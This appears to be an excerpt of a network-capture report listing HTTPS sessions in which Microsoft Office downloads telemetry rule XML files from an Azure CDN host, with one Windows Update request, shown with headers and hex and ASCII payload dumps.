                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                5 | 192.168.2.5 | 49971 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:09 UTC | 192 | OUT | GET /rules/rule120608v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 2160
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                ETag: "0x8DC582BA3B95D81"
                                x-ms-request-id: d2130280-a01e-006f-03c7-4313cd000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f784596886s2bhC1EWR743w000000164g00000000tgz0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                6 | 192.168.2.5 | 49968 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:09 UTC | 193 | OUT | GET /rules/rule120402v21s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC | 494 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 3788
                                Connection: close
                                Vary: Accept-Encoding
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                ETag: "0x8DC582BAC2126A6"
                                x-ms-request-id: 0b3277ea-501e-00a0-5e91-3f9d9f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f7845968psccphC1EWRuz9s00000016eg00000000e579
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                7 | 192.168.2.5 | 49969 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:10 UTC | 192 | OUT | GET /rules/rule224902v2s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 450
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                ETag: "0x8DC582BD4C869AE"
                                x-ms-request-id: 59158d4f-901e-00a0-5491-3f6a6d000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f78459685m244hC1EWRgp2c00000015y000000000tfgr
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                8 | 192.168.2.5 | 49972 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:10 UTC | 192 | OUT | GET /rules/rule120609v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:10 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:10 GMT
                                Content-Type: text/xml
                                Content-Length: 408
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                ETag: "0x8DC582BB56D3AFB"
                                x-ms-request-id: dc0e4179-901e-005b-2991-3f2005000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165110Z-174f78459685726chC1EWRsnbg00000016b0000000003emd
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:10 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                9 | 192.168.2.5 | 49967 | 20.109.210.53 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:10 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=OuAA4CfBYWXbLdl&MD=SSg1k1Wh HTTP/1.1
                                Connection: Keep-Alive
                                Accept: */*
                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                Host: slscr.update.microsoft.com
                                2024-12-03 16:51:10 UTC | 560 | IN | HTTP/1.1 200 OK
                                Cache-Control: no-cache
                                Pragma: no-cache
                                Content-Type: application/octet-stream
                                Expires: -1
                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                MS-CorrelationId: 9be24751-e792-4293-b12c-35362f715af2
                                MS-RequestId: fa3eed5a-a1e9-4c6a-a698-cb95a5a1f432
                                MS-CV: W147Fi1qP0eoclOI.0
                                X-Microsoft-SLSClientCache: 2880
                                Content-Disposition: attachment; filename=environment.cab
                                X-Content-Type-Options: nosniff
                                Date: Tue, 03 Dec 2024 16:51:09 GMT
                                Connection: close
                                Content-Length: 24490


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                10          192.168.2.5  49975        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:12 UTC  192                OUT        GET /rules/rule120611v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                ETag: "0x8DC582B9F6F3512"
                                x-ms-request-id: 896d1f20-701e-0001-29ee-44b110000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968px8v7hC1EWR08ng00000016fg00000000apmd
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC  415                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                11          192.168.2.5  49974        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:12 UTC  192                OUT        GET /rules/rule120610v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 474
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                ETag: "0x8DC582B9964B277"
                                x-ms-request-id: 8ccd6c39-f01e-0085-6e81-3f88ea000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968kvnqxhC1EWRmf3g0000000sz000000000kk2e
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC  474                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                12          192.168.2.5  49976        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:12 UTC  192                OUT        GET /rules/rule120612v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 471
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                ETag: "0x8DC582BB10C598B"
                                x-ms-request-id: 724e5c80-801e-007b-4caf-42e7ab000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f78459684bddphC1EWRbht40000001610000000002n2f
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC  471                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                13          192.168.2.5  49977        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:12 UTC  192                OUT        GET /rules/rule120613v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 632
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB6E3779E"
                                x-ms-request-id: f20189e0-201e-005d-0f7c-43afb3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968jrjrxhC1EWRmmrs00000016eg0000000012cx
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC  632                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                14          192.168.2.5  49978        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:12 UTC  192                OUT        GET /rules/rule120614v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:12 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:12 GMT
                                Content-Type: text/xml
                                Content-Length: 467
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                ETag: "0x8DC582BA6C038BC"
                                x-ms-request-id: c220f382-901e-0029-3552-43274a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165112Z-174f7845968n2hr8hC1EWR9cag00000015ug00000000g167
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:12 UTC  467                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                15          192.168.2.5  49981        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:14 UTC  192                OUT        GET /rules/rule120615v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:14 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:14 GMT
                                Content-Type: text/xml
                                Content-Length: 407
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                ETag: "0x8DC582BBAD04B7B"
                                x-ms-request-id: 8778ab85-f01e-0071-75e9-41431c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165114Z-174f78459685726chC1EWRsnbg000000166g00000000mpwq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:14 UTC  407                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                16          192.168.2.5  49985        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:14 UTC  192                OUT        GET /rules/rule120619v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 407
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                ETag: "0x8DC582B9698189B"
                                x-ms-request-id: 9f28f116-c01e-008d-51c7-432eec000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968frfdmhC1EWRxxbw00000016ag000000004rtb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC  407                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                17          192.168.2.5  49984        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:14 UTC  192                OUT        GET /rules/rule120616v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 486
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                ETag: "0x8DC582BB344914B"
                                x-ms-request-id: 6bbb397f-a01e-0002-2907-415074000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968pght8hC1EWRyvxg00000009d0000000006gf6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC  486                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                18          192.168.2.5  49986        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:14 UTC  192                OUT        GET /rules/rule120618v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 486
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                ETag: "0x8DC582B9018290B"
                                x-ms-request-id: 1383167b-401e-008c-1f3c-4486c2000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968qj8jrhC1EWRh41s000000163000000000r7w3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC  486                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                19          192.168.2.5  49983        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:14 UTC  192                OUT        GET /rules/rule120617v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:15 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:15 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                ETag: "0x8DC582BA310DA18"
                                x-ms-request-id: c955d5f0-801e-00a0-7007-412196000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165115Z-174f7845968pght8hC1EWRyvxg00000009bg00000000ccz1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:15 UTC  427                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                20          192.168.2.5  49987        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:16 UTC  192                OUT        GET /rules/rule120620v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:16 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:16 GMT
                                Content-Type: text/xml
                                Content-Length: 469
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                ETag: "0x8DC582BBA701121"
                                x-ms-request-id: a11b7610-d01e-00ad-11d5-43e942000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165116Z-174f78459685726chC1EWRsnbg00000016a0000000007ecy
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:16 UTC  469                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                21          192.168.2.5  49988        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:17 UTC  192                OUT        GET /rules/rule120621v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC  470                IN         HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                ETag: "0x8DC582BA41997E3"
                                x-ms-request-id: 6ab56c84-d01e-008e-48c7-43387a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165117Z-174f7845968swgbqhC1EWRmnb4000000167g00000000v3hb
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:17 UTC  415                IN         Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session ID  Source IP    Source Port  Destination IP  Destination Port
                                22          192.168.2.5  49989        13.107.246.63   443
                                Timestamp                Bytes transferred  Direction  Data
                                2024-12-03 16:51:17 UTC  192                OUT        GET /rules/rule120622v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:17 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:17 GMT
